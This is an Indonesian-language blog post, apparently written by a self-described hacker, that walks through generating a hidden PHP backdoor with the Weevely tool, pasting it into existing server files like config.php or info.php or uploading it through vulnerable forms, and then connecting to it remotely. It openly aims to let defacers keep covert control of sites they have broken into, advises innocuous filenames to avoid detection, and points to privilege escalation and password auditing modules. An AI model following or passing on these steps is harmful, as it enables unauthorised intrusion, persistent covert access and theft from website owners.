Loading...

cara memasukan Backdoor ke dalam Website PHP file dengan Weevely biar tidak terdeteksi






kali ini saya akan membagikan trik dari teman saya.
saya kami mengunakan ini untuk mengakses website dan mengontrol web yang telah kami susupi ..

mari perhatikan ..

Backdoors adalah cara nyaman untuk meninggalkan setelah Anda sudah menemukan cara ke server, dan mereka dapat berguna untuk berbagai alasan. Mereka baik untuk pengembang cara cepat mengetahui mesin mereka sedang bekerja, atau untuk sistem administrator yang menginginkan akses yang sama. Tentu saja, backdoors juga sahabat hacker, dan dapat ditambahkan dalam berbagai cara. Salah satu alat yang baik untuk melakukan hal ini adalah Weevely, yang menggunakan potongan kode PHP.

Weevely akan membuat terminal pada server target dan memungkinkan untuk tindakan kode remote melalui jejak agen PHP kecil. Ini mencakup lebih dari 30 modul untuk kebutuhan administrasi, serta eskalasi hak istimewa dan bahkan jaringan pergerakan lateral.ini cara terbaik untuk seorang defacer biar bisa selalu memantau web yang telah terdeface.

Dalam panduan ini, kami akan mengambil untuk spin di localhost kita atau ke web sendiri untuk percobaan. Anda dapat mengikuti , atau Anda bisa langsung berjalan pada server lain di mana Anda dapat melakukan lebih banyak lagi.



  • download Weevely

Weevely dapat ditemukan dibangun ke beberapa distribusi Linux, seperti Kali. Jika tidak terinstal di sistem Linux Anda, Anda dapat menemukan versi 3 pada halaman GitHub Epinna ini. Untuk mendapatkannya diinstal pada distro Linux standar, ada berbagai cara Anda dapat memperolehnya, termasuk Git, HTTP, dan wget.

  • Men-download file Git:

   https://github.com/epinna/weevely3.git

  • Download melalui HTTP sekarang di browser Anda:

    https://github.com/epinna/weevely3/archive/master.zip

  • Download melalui wget (di terminal Anda):

     wget https://github.com/epinna/weevely3/archive/master.zip


  • Buat PHP file

apabila anda sudah mendownload, pastikan Anda memiliki terminal atau shell jendela yang terbuka di direktori yang berisi file master.zip. Dengan asumsi ke folder Downloads Anda, mari kita pergi ke sana, unzip file tersebut, berubah menjadi bahwa lokasi folder unzip, dan melakukan daftar cepat untuk memeriksa file.


    cd Downloads
    unzip master.zip
    cd weevely3-master/
    ls



Anda harus menjalankan weevely.py set-up berkas sendiri untuk mendapatkan hal apa yang terjadi di sini, karena script membutuhkan sintaks khusus, dan Anda dapat belajar tentang hal itu di sini.


./weevely.py






Sebagai contoh, kita akan menggunakan "Hasilkan agen backdoor" pilihan. Mari kita membuat pazzWurD password kita, dan memanggil file PHP path backdoor.php. ini harus berakhir dengan sebuah file yang bernama backdoor.php dalam direktori yang sama di mana kita sedang bekerja.

Harap dicatat bahwa backdoor.php bukan nama baik untuk file PHP Anda. Ini hanya sebuah contoh. Anda tidak ingin menarik terlalu banyak perhatian yang Anda lakukan, jadi pastikan untuk mengganti kedua "mypassword" dan "myfilename.php" di bawah ini dengan sesuatu yang kurang disadari.

    ./weevely.py generate mypassword myfilename.php








  • menyelipkan Backdoor Anda

Berbekal script baru PHP (backdoor.php, dalam kasus kami), kita sekarang dapat mempertimbangkan beberapa cara yang bisa kita gunakan. Pertama, jika Anda memiliki akses ke server, Anda dapat menyalin / paste isi dari file PHP Anda ke dalam file PHP lain yang dapat diakses pada server. Sebagai contoh, sebuah config.php atau berkas settings.php yang mungkin ditemukan di sana. Pertama, saya akan menyalin isi dari naskah backdoor.php saya dengan editor teks.






Kemudian, saya akan sisipkan bahwa seluruh blok kode PHP di bawah ini semua kode PHP lainnya pada file yang berjalan pada server saya. Di sini, aku paste di bawah ini semua dalam file info.php server saya. Aku harus menggunakan editor Vi di server saya,






Hal lain yang mungkin mencoba untuk menemukan situs web yang rentan dengan meng-upload kemampuan-jenis yang memungkinkan Anda berbagi file atau gambar. Lakukan itu, mendapatkan link ke file Anda, dan Anda berada dalam bisnis.








Cara apapun yang Anda lakukan, Anda ingin mendapatkan file-atau backdoor.php Anda isi file-ke PHP Anda beberapa file PHP lain, pada beberapa server lokal atau remote. Setelah Anda selesai melakukannya, saatnya untuk memanggil itu.


  • Mengakses Backdoor Anda

Hal pertama tentang Weevely yang mungkin Anda perhatikan adalah bahwa file backdoor.php Anda berjalan di direktori web, atau di ujung situs file PHP lain, tidak melakukan atau menunjukkan apa-apa di browser web Anda. Itu bagus! Apakah ini muncul di situs, itu akan ditemukan segera dan ditambal, atau mungkin dimanfaatkan oleh orang lain, dan kami tidak menginginkan hal itu.






Apa yang kita lakukan adalah membuka weevely.py pada sistem kami lagi, hanya saja kali ini kita tidak akan membuat sebuah file dengan itu-kita akan menggunakannya untuk menargetkan tempat kita meletakkan script yang sudah kita buat. Pada server localhost saya, dengan file saya, ini berarti:


    ./weevely.py http://localhost/info.php pazzWurD


Jika Anda tidak menguji ini dengan localhost, akan menjadi kurang lebih seperti ini:



./weevely.py http://some.websitename.com/myfilename.php mypassword

menggunakan Weevely untuk memanggil file Anda





Weevely memiliki lebih dari 30 modul dibangun, sehingga ada banyak untuk bekerja dengan di sini. Misalnya, file_ls tidak persis apa yang Anda akan berpikir, dan file_cp mungkin membiarkan Anda menyalin file selama Anda bekerja dan ke jalur seperti pada sistem lokal. Anda mungkin bisa mengambil banyak sekaligus dengan file_tar, kemudian gunakan cp untuk membaca.

Ada cara untuk meningkatkan hak-hak Anda dari dalam Weevely, jadi jika Anda mengalami peningkatan hak di server, Anda dapat melakukan pada dasarnya segala sesuatu dengan itu. Anda mungkin bisa mendapatkan beberapa petunjuk pada sistem target Anda dengan audit_password. untuk menghemat waktu dan usaha diri sendiri jika Anda bermain-main dengan sistem Anda sendiri, dan untuk tetap tenang jika pada sistem lain.



  • Penyelesaian masalah

Apakah Anda mengalami kesalahan selama latihan ini? Aku berjalan pada sistem baru, maka sementara saya bisa unzip direktori master.zip dan melihat file itu berisi, saya awalnya tidak bisa mendapatkan script Python Weevely untuk berjalan dengan benar.

Jadi jika Anda mengalami masalah yang sama dan melihat sesuatu seperti ini:


ImportError: No module named prettytable

anda menjalankan sesuatu seperti ini, mengganti nama modul dengan apa pun yang hilang:


$ Sudo apt install python-prettytable
usahakan tetap tenang dan berfikir untuk menyelesaikan nya .
teman saya telah membuat modul-modul ini dan selama ini kami tidak ada masalah dalam menjalankan nya ..


  • salam pembuat script ( EvilToddler )

saya berterima kasih kepada dia telah bersedia mengupload file ini ke github ..

salam hacking ./mr.read
Loading...

Post a Comment

0 Comments